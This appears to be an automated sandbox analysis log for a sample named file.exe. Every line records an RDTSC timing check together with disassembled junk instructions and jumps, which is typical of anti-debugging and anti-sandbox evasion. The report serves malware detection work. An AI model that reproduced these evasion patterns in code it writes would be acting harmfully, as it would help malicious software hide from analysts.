                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD6A0 second address: ACD6B7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6B312295EEh 0x00000008 js 00007F6B312295E6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD6B7 second address: ACD6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD6BB second address: ACD6D8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6B312295F3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACD6D8 second address: ACD6DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1026 second address: AD102D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD102D second address: AD1037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD644B second address: AD6471 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6B312295E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F6B312295F9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6509 second address: AD650D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD650D second address: AD6511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6511 second address: AD6532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F6B30D7C3A1h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6532 second address: AD6538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6538 second address: AD655A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 jl 00007F6B30D7C3B4h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6B30D7C3A2h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD662B second address: AD6660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F6B312295E6h 0x00000015 popad 0x00000016 jnl 00007F6B312295ECh 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 jno 00007F6B312295ECh 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD6660 second address: AD668C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B30D7C3A8h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007F6B30D7C396h 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD668C second address: AD6692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBFBA second address: ADBFC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007F6B30D7C396h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6EC20 second address: A6EC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADADC9 second address: ADADD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB496 second address: ADB49C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB5FA second address: ADB5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADB5FE second address: ADB624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B312295EEh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6B312295F0h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBA0A second address: ADBA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBA0E second address: ADBA40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295ECh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F6B312295E6h 0x00000013 jmp 00007F6B312295F8h 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBA40 second address: ADBA44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBA44 second address: ADBA4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB6C second address: ADBB70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB70 second address: ADBB74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB74 second address: ADBB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB7E second address: ADBB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB82 second address: ADBB86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB86 second address: ADBB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADBB8C second address: ADBB91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE06CE second address: AE06D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE06D4 second address: AE06D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0891 second address: AE089B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B312295E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE089B second address: AE08A5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6B30D7C39Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE08A5 second address: AE08B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F6B312295EAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0A10 second address: AE0A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0B8D second address: AE0B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0B93 second address: AE0B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6B30D7C396h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE0F70 second address: AE0F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE54C2 second address: AE54E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 js 00007F6B30D7C396h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnc 00007F6B30D7C396h 0x00000017 jnl 00007F6B30D7C396h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE54E1 second address: AE54E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE54E7 second address: AE54F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jg 00007F6B30D7C396h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE54F8 second address: AE5525 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F6B312295E8h 0x0000000f jp 00007F6B312295ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE0EC second address: AEE0F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE690 second address: AEE694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE694 second address: AEE69A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDCAE second address: AEDCC6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F6B312295EEh 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDCC6 second address: AEDCCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE96B second address: AEE970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE970 second address: AEE98B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C3A1h 0x00000007 js 00007F6B30D7C3A2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE98B second address: AEE99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6B312295E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE99E second address: AEE9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE9A2 second address: AEE9A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEE9A6 second address: AEE9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA79C second address: AAA7AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAC03 second address: AAAC09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAEAE second address: AAAEB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAEB3 second address: AAAF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F6B30D7C39Bh 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F6B30D7C398h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jp 00007F6B30D7C396h 0x00000032 jmp 00007F6B30D7C3A5h 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAF06 second address: AAAF28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F6B312295E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F6B312295EFh 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAFA8 second address: AAAFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAFAC second address: AAAFB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F6B312295E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB976 second address: AAB97A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB97A second address: AAB984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB984 second address: AAB9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a or ecx, 2C724E28h 0x00000010 lea eax, dword ptr [ebp+1247F551h] 0x00000016 cld 0x00000017 nop 0x00000018 pushad 0x00000019 jnp 00007F6B30D7C3AFh 0x0000001f jmp 00007F6B30D7C3A9h 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6B30D7C3A9h 0x0000002b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3750 second address: AF376E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6B312295F9h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF376E second address: AF379C instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B30D7C3A9h 0x00000008 jmp 00007F6B30D7C3A3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F6B30D7C3BDh 0x00000015 jg 00007F6B30D7C398h 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3901 second address: AF390D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF390D second address: AF3913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3AAF second address: AF3AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3C66 second address: AF3CA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B30D7C3A5h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jng 00007F6B30D7C396h 0x00000010 jmp 00007F6B30D7C3A3h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6B30D7C39Bh 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6864 second address: AF6875 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B312295E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF6875 second address: AF687B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF687B second address: AF6880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF9251 second address: AF9276 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007F6B30D7C396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007F6B30D7C396h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jp 00007F6B30D7C396h 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF96A2 second address: AF96A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF96A6 second address: AF96BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B30D7C3A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF96BD second address: AF96C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F6B312295E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF96C7 second address: AF96E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F6B30D7C39Dh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFF45A second address: AFF460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFF460 second address: AFF469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFF469 second address: AFF46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFF46D second address: AFF48A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B30D7C396h 0x00000008 jmp 00007F6B30D7C3A3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE7B9 second address: AFE7DE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6B312295E6h 0x00000008 jmp 00007F6B312295EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ecx 0x00000014 jg 00007F6B312295E8h 0x0000001a push esi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFE7DE second address: AFE7F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEA62 second address: AFEA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6B312295E6h 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEA6D second address: AFEA9E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6B30D7C3A9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6B30D7C3A1h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEA9E second address: AFEAA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEAA7 second address: AFEAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEE67 second address: AFEE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6B312295EAh 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEE7A second address: AFEE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFEE80 second address: AFEE84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B01B94 second address: B01BA8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jns 00007F6B30D7C396h 0x00000013 pop ebx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B01BA8 second address: B01BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B095A0 second address: B095A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B095A6 second address: B095AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
